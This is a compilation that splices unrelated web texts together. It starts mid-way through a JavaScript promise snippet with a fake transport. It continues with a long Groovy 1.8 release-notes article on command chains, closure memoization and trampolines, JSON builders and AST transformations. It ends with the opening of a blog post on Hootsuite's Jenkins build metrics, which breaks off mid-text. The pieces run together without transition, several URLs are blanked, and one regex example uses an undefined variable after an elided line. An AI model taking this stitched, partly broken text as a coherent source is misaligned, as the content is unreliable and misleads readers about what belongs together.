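      transport.onload = function () { resolve(transport.responseText); };
      transport.onerror = function () { reject(new Error("Error!")); };
      transport.send(data);
    } catch (e) {
      reject(e);
    }
  });
}

// A fake transport, purely for demonstration.
var fakeTransport = {
  open: function (method, url, async) { this.url = url; },
  send: function (data) { this.responseText = "Success!"; this.onload(); },
};

post("/endpoint", "payload", fakeTransport).then(function (text) {
  console.log(text); // "Success!"
});
```

With a real XMLHttpRequest you would pass the request object itself as transport.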
https://css-tricks.com/the-javascript-ah-ha-moment/
The 1.8 release of Groovy comes with many new features that greatly enhance the language.

These features have undergone the Groovy developer process, with formal descriptions, discussion, and voting (GEP - Groovy Enhancement Proposal) for core parts, and less formal developer discussions and JIRA voting for additional parts.

Our goal has stayed the same, though: to give the Java developer a tool that makes him more productive, allows him to achieve his goals faster and with a smaller margin of error, and extend the scalability of the Java platform from full-blown enterprise projects to everyday "getting things done" tasks.

Thanks to its flexible syntax and its compile-time and runtime metaprogramming capabilities, Groovy is well known for its Domain-Specific Language capabilities. However, we felt that we could improve upon the syntax further by removing additional punctuation symbols when users chain method calls. This allows DSL implementors to develop command descriptions that read almost like natural sentences.

Before Groovy 1.8, we could omit parentheses around the arguments of a method call for top-level statements, but we couldn't chain method calls. The new "command chain" feature allows us to chain such parentheses-free method calls, requiring neither parentheses around arguments, nor dots between the chained calls. The general idea is that a call like a b c d will actually be equivalent to a(b).c(d). This also works with multiple arguments, closure arguments, and even named arguments.
Furthermore, such command chains can also appear on the right-hand side of assignments. Let's have a look at some examples supported by this new syntax:

turn left then right
// equivalent to: turn(left).then(right)

take 2.pills of chloroquinine after 6.hours
// equivalent to: take(2.pills).of(chloroquinine).after(6.hours)

It is also possible to use methods in the chain which take no arguments, but in that case, the parentheses are needed:

select all unique() from names
// equivalent to: select(all).unique().from(names)

If your command chain contains an odd number of elements, the chain will be composed of method / arguments pairs, and will finish with a final property access:

take 3 cookies
// equivalent to: take(3).cookies
// and also this: take(3).getCookies()

This new command chain approach opens up interesting possibilities in terms of the much wider range of DSLs which can now be written in Groovy. This new feature has been developed thanks to the Google Summer of Code program, where our student, Lidia, helped us modify the Groovy Antlr grammar to extend top-level statements to accept the command chain syntax.

The above examples illustrate using a command chain based DSL, but not how to create one.
You will be able to find some further examples of "command chains" on the Groovy Web Console, but to illustrate creating such a DSL, we will show just a couple of examples - first using maps and Closures:

show = { println it }
square_root = { Math.sqrt(it) }

def please(action) {
    [the: { what ->
        [of: { n -> action(what(n)) }]
    }]
}

please show the square_root of 100
// equivalent to: please(show).the(square_root).of(100)
// ==> 10.0

Or if you prefer Japanese and a metaprogramming style (see here for more details):

// Japanese DSL using GEP3 rules
Object.metaClass.を = Object.metaClass.の = { clos -> clos(delegate) }
まず = { it }
表示する = { println it }
平方根 = { Math.sqrt(it) }

まず 100 の 平方根 を 表示する
// First, show the square root of 100
// => 10.0

As a second example, consider how you might write a DSL for simplifying one of your existing APIs. Maybe you need to put this code in front of customers, business analysts or testers who might not be hard-core Java developers. We'll use the Splitter from the Google Guava libraries project, as it already has a nice Fluent API. Here is how we might use it out of the box:

@Grab('com.google.guava:guava:r09')
import com.google.common.base.*

def result = Splitter.on(',').trimResults(CharMatcher.is('_' as char)).split("_a ,_b_ ,c__").iterator().toList()
assert result == ['a ', 'b_ ', 'c']

It reads fairly well for a Java developer, but if that is not your target audience, or you have many such statements to write, it could be considered a little verbose. Again, there are many options for writing a DSL. We'll keep it simple with Maps and Closures.
We'll first write a helper method:

def split(string) {
    [on: { sep ->
        [trimming: { trimChar ->
            Splitter.on(sep).trimResults(CharMatcher.is(trimChar as char)).split(string).iterator().toList()
        }]
    }]
}

now instead of this line from our original example:

def result = Splitter.on(',').trimResults(CharMatcher.is('_' as char)).split("_a ,_b_ ,c__").iterator().toList()

we can write this:

def result = split "_a ,_b_ ,c__" on ',' trimming '_'

Groovy's flexible metaprogramming model involves numerous decision points when making method calls or accessing properties, to determine whether any metaprogramming hooks are being utilized. During complex expression calculations, such decision points involved identical checks being executed numerous times. Recent performance improvements allow some of these checks to be bypassed during an expression calculation once certain initial assumptions have been checked. Basically, if certain preconditions hold, some streamlining can take place.

Groovy 1.8.0 contains two main streams of optimization work:

Those two areas of optimization are only the beginning of further similar improvements. Upcoming versions of the Groovy 1.8.x branch will see more optimizations coming. In particular, primitive types other than integers should be expected to be supported shortly.

The GPars project offers developers new intuitive and safe ways to handle Java or Groovy tasks concurrently, asynchronously, and distributed, by utilizing the power of the Java platform and the flexibility of the Groovy language. Groovy 1.8 now bundles GPars 0.11 in the libraries of the Groovy distribution.

Closures are a central and essential piece of the Groovy programming language and are used in various ways throughout the Groovy APIs. In Groovy 1.8, we introduce the ability to use closures as annotation parameters.
Closures are also a key part of what gives Groovy its functional flavor.

In Java, there's a limited set of types you can use as annotation parameters (String, primitives, annotations, classes, and arrays of these). But in Groovy 1.8, we're going further and let you use closures as annotation parameters – which are actually transformed into a class parameter for compatibility reasons.

import java.lang.annotation.*

@Retention(RetentionPolicy.RUNTIME)
@interface Invariant {
    Class value() // will hold a closure class
}

@Invariant({ number >= 0 })
class Distance {
    float number
    String unit
}

def d = new Distance(number: 10, unit: "meters")

def anno = Distance.getAnnotation(Invariant)
def check = anno.value().newInstance(d, d)
assert check(d)

Closure annotation parameters open up some interesting possibilities for framework authors! As an example, the GContracts project, which brings the "Design by Contract" paradigm to Groovy, makes heavy use of annotation parameters to allow preconditions, postconditions and invariants to be declared.

If you recall your math lessons, function composition may be a concept you're familiar with. And in turn, Closure composition is about just that: the ability to compose Closures together to form a new Closure which chains the calls of those Closures.
Here's an example of composition in action:

def plus2 = { it + 2 }
def times3 = { it * 3 }

def times3plus2 = plus2 << times3
assert times3plus2(3) == 11
assert times3plus2(4) == plus2(times3(4))

def plus2times3 = times3 << plus2
assert plus2times3(3) == 15
assert plus2times3(5) == times3(plus2(5))

// reverse composition
assert times3plus2(3) == (times3 >> plus2)(3)

To see more examples of Closure composition and reverse composition, please have a look at our test case.

When writing recursive algorithms, you may be getting the infamous stack overflow exceptions, as the stack starts to have a too high depth of recursive calls. An approach that helps in those situations is using Closures and their new trampoline capability.

Closures are wrapped in a TrampolineClosure. Upon calling, a trampolined Closure will call the original Closure, waiting for its result. If the outcome of the call is another instance of a TrampolineClosure, created perhaps as a result of a call to the trampoline() method, the Closure will again be invoked. This repetitive invocation of returned trampolined Closure instances will continue until a value other than a trampolined Closure is returned. That value will become the final result of the trampoline. That way, calls are made serially, rather than filling the stack.

Here's an example of the use of trampoline() to implement the factorial function:

def factorial
factorial = { int n, def accu = 1G ->
    if (n < 2) return accu
    factorial.trampoline(n - 1, n * accu)
}
factorial = factorial.trampoline()

assert factorial(1)    == 1
assert factorial(3)    == 1 * 2 * 3
assert factorial(1000) == 402387260... // plus another 2560 digits

Another improvement to Closures is the ability to memoize the outcome of previous (ideally side-effect free) invocations of your Closures.
The return values for a given set of Closure parameter values are kept in a cache for those memoized Closures. That way, if you have an expensive computation to make that takes seconds, you can put the return value in the cache, so that the next execution with the same parameter will return the same result – again, we assume the results of an invocation are the same given the same set of parameter values.

In addition to memoize(), which caches all the invocations, there are three variants:

memoizeAtMost(max), which caches a maximum number of invocations

memoizeAtLeast(min), which keeps at least a certain number of invocation results

memoizeBetween(min, max), which keeps a range of results (between a minimum and a maximum)

Let's illustrate that:

def plus = { a, b -> sleep 1000; a + b }.memoize()

assert plus(1, 2) == 3 // after 1000ms
assert plus(1, 2) == 3 // returns immediately
assert plus(2, 2) == 4 // after 1000ms
assert plus(2, 2) == 4 // returns immediately

// other forms:

// at least 10 invocations cached
def plusAtLeast = { ... }.memoizeAtLeast(10)

// at most 10 invocations cached
def plusAtMost = { ... }.memoizeAtMost(10)

// between 10 and 20 invocations cached
def plusBetween = { ... }.memoizeBetween(10, 20)

Currying improvements have also been backported to recent releases of Groovy 1.7, but it's worth outlining them here for reference.
Currying used to be done only from left to right, but it's also possible to do it from right to left, or from a given index, as the following examples demonstrate:

// right currying
def divide = { a, b -> a / b }
def halver = divide.rcurry(2)
assert halver(8) == 4

// currying the n-th parameter
def joinWithSeparator = { one, sep, two -> one + sep + two }
def joinWithComma = joinWithSeparator.ncurry(1, ', ')
assert joinWithComma('a', 'b') == 'a, b'

With the ubiquity of JSON as an interchange format for our applications, it is natural that Groovy added support for JSON, in a similar fashion to the support Groovy has always had for XML. So Groovy 1.8 introduces a JSON builder and parser.

A JsonSlurper class allows you to parse JSON payloads and access the nested Map and List data structures representing that content. JSON objects and arrays are indeed simply represented as Maps and Lists, giving you access to all the GPath expression benefits (subscript/property notation, find/findAll/each/inject/groupBy/etc.). Here's an example showing how to find all the recent commit messages on the Grails project:

import groovy.json.*

def payload = new URL(" ails/grails-core/master").text
def slurper = new JsonSlurper()
def doc = slurper.parseText(payload)

doc.commits.message.each { println it }

If you want to see some more examples of the usage of the JSON parser, you can have a look at the JsonSlurper tests in our code base.

Parsing JSON data structures is one thing, but we should also be able to produce JSON content, just like we create markup with the MarkupBuilder.
The following example:

import groovy.json.*

def json = new JsonBuilder()

json.person {
    name "Guillaume"
    age 33
    pets "Hector", "Felix"
}

println json.toString()

Will create the JSON output:

{"person":{"name":"Guillaume","age":33,"pets":["Hector","Felix"]}}

You can find some more usages of the JSON builder in our JsonBuilder tests.

When given a JSON data structure, you may wish to pretty-print it, so that you can more easily inspect it, with a friendlier layout. So for instance, if you want to pretty-print the result of the previous example, you could do:

import groovy.json.*

println JsonOutput.prettyPrint('''{"person":{"name":"Guillaume","age":33,"pets":["Hector","Felix"]}}''')

Which would result in the following pretty-printed output:

{
    "person": {
        "name": "Guillaume",
        "age": 33,
        "pets": [
            "Hector",
            "Felix"
        ]
    }
}

The Groovy compiler reads the source code, builds an Abstract Syntax Tree (AST) from it, and then turns the AST into bytecode. With AST transformations, the programmer can hook into this process. A general description of this process, an exhaustive description of all available transformations, and a guide on how to write your own can be found, for example, in Groovy in Action, 2nd Edition (MEAP), chapter 9.

Below is a list of all new transformations that come with Groovy 1.8. They save you from writing repetitive code and help avoid common errors.

You can annotate your classes with the @Log transformation to automatically inject a logger in your Groovy classes, under the log property. Four kinds of loggers are actually available:

@Log for java.util.logging
@Commons for Commons-Logging
@Log4j for Log4J
@Slf4j for SLF4J

Here's a sample usage of the @Log transformation:

import groovy.util.logging.Log

@Log
class Car {
    Car() {
        log.info 'Car constructed'
    }
}

When defining variables in a script, those variables are actually local to the script's run method, so they are not accessible from other methods of the script.
A usual approach to that problem has been to store variables in the binding, by not def'ining those variables and by just assigning them a value. Fortunately, the @Field transformation provides a better alternative: by annotating your variables in your script with this annotation, the annotated variable will become a private field of the script class. More concretely, you'll be able to do as follows:

@Field List awe = [1, 2, 3]
def awesum() { awe.sum() }
assert awesum() == 6

The @PackageScope annotation can be placed on classes, methods or fields and is used for turning off Groovy's visibility conventions and reverting back to Java conventions. This ability is usually only needed when using 3rd party libraries which rely on package scope visibility. When adding the @PackageScope annotation to a field, Groovy will assign package scope access to the field rather than automatically treating it as a property (and adding setters/getters). Annotating a class or method with @PackageScope gives it package scope visibility rather than Groovy's default public visibility.

The @AutoClone annotation is placed on classes which you want to be Cloneable. The annotation instructs the compiler to execute an AST transformation which adds a public clone() method and adds Cloneable to the class's implements list of interfaces. Because the JVM doesn't have a one-size-fits-all cloning strategy, several customizations exist for the cloning implementation. By default, the clone() method will call super.clone() before calling clone() on each Cloneable property of the class.

Example usage:

import groovy.transform.AutoClone

@AutoClone
class Person {
    String first, last
    List favItems
    Date since
}

Which will create a class of roughly the following form:

class Person implements Cloneable {
    ...
    public Object clone() throws CloneNotSupportedException {
        Object result = super.clone()
        result.favItems = favItems.clone()
        result.since = since.clone()
        return result
    }
    ...
}

If some of your fields are final and Cloneable, you should set style=COPY_CONSTRUCTOR, which will then use the copy constructor pattern.
If your classes implement the Serializable or Externalizable interface, you might like to set style=SERIALIZATION, which will then use serialization to do the cloning. See the Javadoc for AutoClone for further details.

The @AutoExternalize class annotation is used to assist in the creation of Externalizable classes. The annotation instructs the compiler to execute an AST transformation which adds writeExternal() and readExternal() methods to a class and adds Externalizable to the interfaces which the class implements. The writeExternal() method writes each property (or field) of the class, while the readExternal() method will read each one back in the same order. Properties or fields marked as transient are ignored.

Example usage:

import groovy.transform.*

@AutoExternalize
class Person {
    String first, last
    List favItems
    Date since
}

Which will create a class of the following form:

class Person implements Externalizable {
    ...
    void writeExternal(ObjectOutput out) throws IOException {
        out.writeObject(first)
        out.writeObject(last)
        out.writeObject(favItems)
        out.writeObject(since)
    }

    void readExternal(ObjectInput oin) {
        first = oin.readObject()
        last = oin.readObject()
        favItems = oin.readObject()
        since = oin.readObject()
    }
    ...
}

When integrating user-provided Groovy scripts and classes in your Java application, you may need a way to interrupt their execution when the thread is interrupted, when a certain duration has elapsed, or when a certain condition is met (lack of resources, etc).

Groovy 1.8 introduces three transformations for those purposes, as we shall see in the following sections. By default, the three transformations add some checks at the beginning of each method body and each closure body, to check whether a condition of interruption is met or not.

Note that those transformations are local (triggered by an annotation).
If you want to apply them transparently, so that the annotation doesn't show up, I encourage you to have a look at the ASTTransformationCustomizer explained at the end of this article. Cédric Champeau, our most recent Groovy committer, who implemented those features, has a very nice blog post covering those code interruption transformations.

You don't need to write checks in your scripts for whether the current thread of execution has been interrupted or not; by default, the transformation will add those checks for you, for scripts and classes, at the beginning of each method body and closure body:

@ThreadInterrupt
import groovy.transform.ThreadInterrupt

while (true) {
    // eat lots of CPU
}

You can specify a checkOnMethodStart annotation parameter (defaults to true) to customize where checks are added by the transformation (an interrupt check is added by default as the first statement of a method body). And you can also specify the applyToAllClasses annotation parameter (defaults to true) if you want to specify whether only the current class or script should have this interruption logic applied or not.

With @TimedInterrupt, you can interrupt the script after a certain amount of time:

@TimedInterrupt(10)
import groovy.transform.TimedInterrupt

while (true) {
    // eat lots of CPU
}

In addition to the previous annotation parameters we mentioned for @ThreadInterrupt, you should specify value, the amount of time to wait, and unit (defaulting to TimeUnit.SECONDS) to specify the unit of time to be used.

An example of @ConditionalInterrupt which leverages the closure annotation parameter feature, and the @Field transformation as well:

@ConditionalInterrupt({ counter++ > 2 })
import groovy.transform.ConditionalInterrupt
import groovy.transform.Field

@Field int counter = 0

100.times {
    println 'executing script method...'
}

You can imagine defining any kind of condition: on counters, on resource availability, on resource usage, and more.

@ToString provides your classes with a default toString() method which prints out the values of the class's properties (and optionally the property names, and optionally fields). A basic example:

import groovy.transform.ToString

@ToString
class Person {
    String name
    int age
}

println new Person(name: 'Pete', age: 15)
// => Person(Pete, 15)

And here's another example using a few more options:

@ToString(includeNames = true, includeFields = true)
class Coord {
    int x, y
    private z = 0
}

println new Coord(x: 20, y: 5)
// => Coord(x:20, y:5, z:0)

@EqualsAndHashCode provides your classes with equals() and hashCode() methods based on the values of the class's properties (and optionally fields, and optionally super class values for equals() and hashCode()).

import groovy.transform.EqualsAndHashCode

@EqualsAndHashCode
class Coord {
    int x, y
}

def c1 = new Coord(x: 20, y: 5)
def c2 = new Coord(x: 20, y: 5)

assert c1 == c2
assert c1.hashCode() == c2.hashCode()

@TupleConstructor provides a tuple (ordered) constructor. For POGOs (plain old Groovy objects), this will be in addition to Groovy's default "named-arg" constructor.

import groovy.transform.TupleConstructor

@TupleConstructor
class Person {
    String name
    int age
}

def p1 = new Person(name: 'Pete', age: 15) // map-based
def p2 = new Person('Pete', 15)            // tuple-based

assert p1.name == p2.name
assert p1.age == p2.age

@Canonical allows you to combine @ToString, @EqualsAndHashCode and @TupleConstructor. For those familiar with Groovy's @Immutable transform, this provides similar features but for mutable objects.
import groovy.transform.Canonical

@Canonical
class Person {
    String name
    int age
}

def p1 = new Person(name: 'Pete', age: 15)
def p2 = new Person('Paul', 15)
p2.name = 'Pete'

println "${p1.equals(p2)} $p1 $p2"
// => true Person(Pete, 15) Person(Pete, 15)

By default, @Canonical gives you vanilla versions of each of the combined annotations. If you want to use any of the special features that the individual annotations give you, simply include the individual annotation as well.

import groovy.transform.*

@Canonical
@ToString(includeNames = true)
class Person {
    String name
    int age
}

def p = new Person(name: 'Pete', age: 15)
println p
// => Person(name:Pete, age:15)

You will find a great write-up on @Canonical, @ToString, @EqualsAndHashCode and @TupleConstructor on John Prystash's weblog.

Sometimes, when you want to subclass certain classes, you also need to override all the constructors of the parent, even if only to call the super constructor. Such a case happens, for instance, when you define your own exceptions: you want your exceptions to also have the constructors taking messages and throwables as parameters. But instead of writing this kind of boilerplate code each time for your exceptions:

class CustomException extends Exception {
    CustomException() { super() }
    CustomException(String msg) { super(msg) }
    CustomException(String msg, Throwable t) { super(msg, t) }
    CustomException(Throwable t) { super(t) }
}

Simply use the @InheritConstructors transformation, which takes care of overriding the base constructors for you:

import groovy.transform.*

@InheritConstructors
class CustomException extends Exception {}

The @WithReadLock and @WithWriteLock transformations, combined together, simplify the usage of the synchronized keyword, and improve upon the @Synchronized transformation with more granular locking.
More concretely, with an example, the following:

import groovy.transform.*

class ResourceProvider {
    private final Map<String, String> data = new HashMap<>()

    @WithReadLock
    String getResource(String key) {
        return data.get(key)
    }

    @WithWriteLock
    void refresh() {
        // reload the resources into memory
    }
}

Will generate code as follows:

import java.util.concurrent.locks.ReentrantReadWriteLock
import java.util.concurrent.locks.ReadWriteLock

class ResourceProvider {
    private final ReadWriteLock $reentrantlock = new ReentrantReadWriteLock()
    private final Map<String, String> data = new HashMap<>()
    ...
}

If you annotate a Collection type field with @ListenerList, it generates everything that is needed to follow the bean event pattern. This is kind of an EventType-independent version of what @Bindable is for PropertyChangeEvents.

This example shows the most basic usage of the @ListenerList annotation. The easiest way to use this annotation is to annotate a field of type List and give the List a generic type. In this example we use a List of type MyListener. MyListener is a one-method interface that takes a MyEvent as a parameter. The following code is some sample source code showing the simplest scenario.

interface MyListener {
    void eventOccurred(MyEvent event)
}

class MyEvent {
    def source
    String message

    MyEvent(def source, String message) {
        this.source = source
        this.message = message
    }
}

class MyBeanClass {
    @ListenerList
    List<MyListener> listeners
}

Groovy 1.9 will be the version which will align as much as possible with the upcoming JDK 7, so beyond those aspects already covered in Groovy (like strings in switch and others), most of those "Project Coin" proposals will be in 1.9, except the "diamond operator", which was added in 1.8, as explained in the following paragraph.

Java 7 will introduce the "diamond" operator in generics type information, so that you can avoid the usual repetition of the parameterized types.
Groovy decided to adopt the notation before JDK 7 is actually released. So instead of writing:

List<List<String>> list1 = new ArrayList<List<String>>()

You can "omit" the parameterized types and just use the pointy brackets, which now look like a diamond:

List<List<String>> list1 = new ArrayList<>()

def isEven = { it % 2 == 0 }
assert [2, 4, 2, 1, 3, 5, 2, 4, 3].count(isEven) == 5

assert [0: 2, 1: 3] == [1, 2, 3, 4, 5].countBy { it % 2 }
assert [(true): 2, (false): 4] == 'Groovy'.toList().countBy { it == 'o' }

assert [10, 20].plus(1, 'a', 'b') == [10, 'a', 'b', 20]

assert [1L, 2.0] as Set == [1, 2] as Set
assert [a: 2, b: 3] == [a: 2L, b: 3.0]

assert [1, 2, 2, 2, 3].toSet() == [1, 2, 3] as Set
assert 'groovy'.toSet() == ['v', 'g', 'r', 'o', 'y'] as Set

def map = [a: 1, bbb: 4, cc: 5, dddd: 2]
assert map.max { it.key.size() }.key == 'dddd'
assert map.min { it.value }.value == 1

Maps now support a withDefault method. So instead of writing code like below:

def words = "one two two three three three".split()
def freq = [:]
words.each {
    if (it in freq) freq[it] += 1
    else freq[it] = 1
}

you can now write:

def words = "one two two three three three".split()
def freq = [:].withDefault { k -> 0 }
words.each { freq[it] += 1 }

Slashy strings are now multi-line:

def poem = /
to be
or not
to be
/
assert poem.readLines().size() == 4

This is particularly useful for multi-line regexes when using the regex free-spacing comment style (though you would still need to escape slashes):

// match yyyy-mm-dd
...

A new string notation has been introduced: the "dollar slashy" string. This is a multi-line GString similar to the slashy string, but with slightly different escaping rules. You are no longer required to escape a slash (with a preceding backslash), but you can use '$$' to escape a '$' or '$/' to escape a slash if needed.
Here's an example of its usage:

def name = "Guillaume"
def date = "April, 21st"

def dollarSlashy = $/
Hello $name,
today we're ${date}

$ dollar-sign
$$ dollar-sign
\ backslash
/ slash
$/ slash
/$

println dollarSlashy

This form of string is typically used when you wish to embed content that may naturally contain slashes or backslashes and you don't want to have to rework the content to include all of the necessary escaping. Some examples are shown below:

def tic = 'tic'
def xml = $/
<xml>
$tic\tac
</xml>
/$
assert "\n<xml>\ntic\\tac\n</xml>\n" == xml

def dir = $/C:\temp\/$

// match yyyy-mm-dd
assert '10-08-1989' == '1989/08/10'.find(dateRegex) { all, y, m, d -> [d, m, y].join('-') }

def alphabet = ('a'..'z').join('')
def code = $/
def normal = '\b\t\n\r'
def slashy = /\b\t\n\r/
assert '$alphabet'.size() == 26
assert normal.size() == 4
assert slashy.size() == 8
/$
println code
Eval.me(code)

The compilation of Groovy code can be configured through the CompilerConfiguration class, for example for setting the encoding of your sources, the base script class, the recompilation parameters, etc. CompilerConfiguration now has a new option for setting compilation customizers (belonging to the org.codehaus.groovy.control.customizers package). Those customizers allow you to customize the compilation process in three ways:

ImportCustomizer: so you don't have to always add the same imports all over again

SecureASTCustomizer: by allowing/disallowing certain classes or special AST nodes (Abstract Syntax Tree), and filtering imports, you can secure your scripts to avoid malicious code or code that would go beyond the limits of what the code should be allowed to do.

ASTTransformationCustomizer: lets you apply transformations to all the class nodes of your compilation unit.
For example, if you want to apply the @Log transformation to all the classes and scripts, you could do:

import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.customizers.*
import groovy.util.logging.Log

def configuration = new CompilerConfiguration()
configuration.addCompilationCustomizers(new ASTTransformationCustomizer(Log))

def shell = new GroovyShell(configuration)
shell.evaluate("""
    class Car {
        Car() {
            log.info 'Car constructed'
        }
    }

    log.info 'Constructing a car'
    def c = new Car()
""")

This will log the two messages, the one from the script and the one from the Car class constructor, through java.util.logging. No need to apply the @Log transformation manually to both the script and the class: the transformation is applied to all class nodes transparently. This mechanism can also be used for adding global transformations, just for the classes and scripts that you compile, instead of those global transformations being applied to all scripts and classes globally.

If you want to add some default imports (single imports, static imports, star imports, static star imports, and also aliased imports and static imports), you can use the import customizer as follows:

import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.customizers.*

def configuration = new CompilerConfiguration()
def custo = new ImportCustomizer()
custo.addStaticStar(Math.name)
configuration.addCompilationCustomizers(custo)

def shell = new GroovyShell(configuration)
shell.evaluate("""
    cos PI/3
""")

When you want to evaluate Math expressions, you no longer need to use the import static java.lang.Math.* static star import to bring in all the Math constants and static functions.
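The SecureASTCustomizer listed above can be configured in the same fashion. A minimal sketch: the closuresAllowed and methodDefinitionAllowed properties used here are part of its API, but the particular restrictions chosen are arbitrary illustrations of locking down user-evaluated scripts:

```groovy
import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.customizers.SecureASTCustomizer

def secure = new SecureASTCustomizer()
secure.closuresAllowed = false          // forbid closures in evaluated scripts
secure.methodDefinitionAllowed = false  // forbid method definitions too

def configuration = new CompilerConfiguration()
configuration.addCompilationCustomizers(secure)

def shell = new GroovyShell(configuration)
assert shell.evaluate("1 + 1") == 2
// shell.evaluate("{ -> 1 }") would now fail with a compilation error
```

The customizer rejects disallowed constructs at compile time, before the script ever runs, which is what makes it suitable for sandboxing user input.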
Given a String or a GString, you can coerce it to Enum values bearing the same name, as the sample below presents:

enum Color { red, green, blue }

// coercion with as
def r = "red" as Color
// implicit coercion
Color b = "blue"
// with GStrings too
def g = "${'green'}" as Color

Maps now support isCase(), so you can use maps in your switch/case statements, for instance:

def m = [a: 1, b: 2]
def val = 'a'
switch (val) {
    case m: "key in map"; break
    // equivalent to
    // case { val in m }: ...
    default: "not in map"
}

When you need to specify a special grab resolver, for when the artifacts you need are not stored in Maven central, you could use:

@GrabResolver(name = 'restlet.org', root = '')
@Grab('org.restlet:org.restlet:2.0.6')
import org.restlet.Restlet

Groovy 1.8 adds a shorter syntax as well:

@GrabResolver('')
@Grab('org.restlet:org.restlet:2.0.6')
import org.restlet.Restlet

The @Grab annotation has numerous options. For example, to download the Apache commons-io library (where you wanted to set the transitive and force attributes - not strictly needed for this example but see the Grab or Ivy documentation for details on what those attributes do) you could use a grab statement similar to below:

@Grab(group='commons-io', module='commons-io', version='2.0.1', transitive=false, force=true)

The compact form for grab, which allows the artifact information to be represented as a string, now supports specifying additional attributes. As an example, the following script will download the commons-io jar and the corresponding javadoc jar before using one of the commons-io methods:

@Grab('commons-io:commons-io:2.0.1;transitive=false;force=true')
@Grab('commons-io:commons-io:2.0.1;classifier=javadoc')
import static org.apache.commons.io.FileSystemUtils.*
assert freeSpaceKb() > 0

The eachRow and rows methods in the groovy.sql.Sql class now support paging.
Here's an example:

sql.eachRow('select * from PROJECT', 2, 2) { row ->
    println "${row.name.padRight(10)} ($row.url)"
}

This will start at the second row and return a maximum of 2 rows. Here's an example result from a database containing numerous projects with their URLs:

Grails ()
Griffon ()

When developing AST transformations, and particularly when using a visitor to navigate the AST nodes, it is sometimes tricky to keep track of information as you visit the tree, or for a combination of transforms to share some context. The ASTNode base class features 4 methods to store node metadata:

public Object getNodeMetaData(Object key)
public void copyNodeMetaData(ASTNode other)
public void setNodeMetaData(Object key, Object value)
public void removeNodeMetaData(Object key)

GroovyDoc uses hard-coded templates to create the JavaDoc for your Groovy classes. Three templates are used: top-level templates, a package-level template, and a class template. If you want to customize these templates, you can subclass the Groovydoc Ant task and override the getDocTemplates(), getPackageTemplates(), and getClassTemplates() methods, pointing at your own templates. Then you can use your custom GroovyDoc Ant task in lieu of Groovy's original one.
The Case for Metrics In Jenkins At Hootsuite, we know that we run up to 3000 Jenkins jobs per weekday. On weekends, it drops all the way down to around 40 jobs (there are automated jobs that are always running). Out of those jobs, 32.02% are built on master branches; they build changes for production services. The rest are tests, scheduled jobs, GitHub pull requests, and everything else we need to keep our pipelines and services running both smoothly and reliably. We also know that Go projects account for roughly 20% of all the Jenkins jobs we build. Scala and Ruby projects each account for roughly 10%. Node projects follow at 9%. The rest use the base JNLP pod and have no specific language requirements, with the exception of a few PHP and other specialized jobs as can be seen below. We know all of this because these metrics are tracked. These tracked metrics allow us to better serve Hootsuite developers that rely on our internal platforms. They let us know which languages Jenkins needs to support, which projects are undergoing the most changes, and most importantly where our attention and maintenance is most needed. This wasn’t always the case. Pipelines of the Past Just four years ago in 2018 we didn’t have any regular metrics on our Jenkins instance. We only had irregular metrics, run once or twice for a few data points at a time. But, without anyone regularly looking at them, and no maintenance done to retain them, the data was quickly lost. If we were asked how Jenkins was performing — or even if it was meeting our needs — we didn’t have an answer. We also didn’t know if our updates and changes improved Jenkins’ performance for developers or did the opposite. Rather than metrics, work on the Jenkins instance was entirely dictated by what complaints we received at any point in time. How many development or human resources did we need? Were we spending more on servers or development time than needed? 
Were jobs failing due to incorrect configuration, or not starting up at all? We didn't have any way to tell. Our goal was to be able to answer all of these questions. When we first started trying to collect meaningful data from Jenkins we started with the question we were asked most often: Are our Jenkins pipelines able to reliably deploy? At this time, we had many different pipelines all with very different deploy patterns and stages making it difficult to know where to start. Without a common deployment pattern to use we decided to instead focus on the job that saw the most developer traffic. This was much easier to identify as we could see which projects on GitHub had the highest rate of commits. And so, we were able to choose a starting project: 'The Dashboard' pipeline. As it happened, The Dashboard pipeline was also the pipeline we received the most complaints about. We could quickly make a big splash! Collecting metrics from The Dashboard would make it possible to show just how valuable consistent metrics would be to a large audience of developers. In the interest of making the biggest impression we could, we collected the first metrics for the Integration Test Stage of The Dashboard pipeline. This would make the greatest impression because every time this stage failed it sent a Slack alert to all of the developers working on the project. In fact, at this time there were many, many Slack messages sent for this stage of the pipeline. It alone accounted for the majority of complaints we received. But, just how bad was it? We were about to find out. The Dashboard is a very high-traffic project at Hootsuite. It also had the greatest number of smoke tests; and, as smoke tests often do, they failed often. Every time these tests failed they would block the entire pipeline as multiple developers tried to get their changes out. It was a huge roadblock. We knew it wasted developer time; but, we wanted to know how much.
Below is an old slide from four years ago; it shows the answer to our question on how often the build failed and the general build duration. The units are in minutes. This was just the preliminary data we received; but, the picture it painted was consistent with the data we continued to receive after it was rolled out. As you can see, for every successful build of The Dashboard there would be two failures. With build times in the ‘Build Duration’ section averaging more than 60 minutes, this meant rerunning these tests were wasting hours of dev time everyday. In the data we continued to collect we learned that in the month of February four years ago, more than 290 hours were spent just rerunning tests for that single project. The Jenkins job for The Dashboard itself only succeeded 77 out of 218 times on the first run, which translates to an astonishing 65% build failure rate. At last, we had the data to prove that the Jenkins pipeline was in serious need of maintenance. After this we were able to expand our metrics gathered on Jenkins and built a better understanding around the most common issues our pipelines encountered. This realization officially began our metrics journey four years ago; and, now in present day we have made many changes and improvements to how we collect our data. These days we use Prometheus for collecting metrics and have our metrics dashboards in Grafana. We have also moved our Jenkins instance onto Kubernetes. This means the amount of meaningful metrics we collect and our ability to use the data has increased significantly. So, what do we do now? New and Improved These days we have many different metrics that we collect. This gives us a full picture of how Jenkins is performing. These metrics are collected in different ways to accommodate the different pipelines and stages that we run, ensuring that all of our pipelines can be covered. 
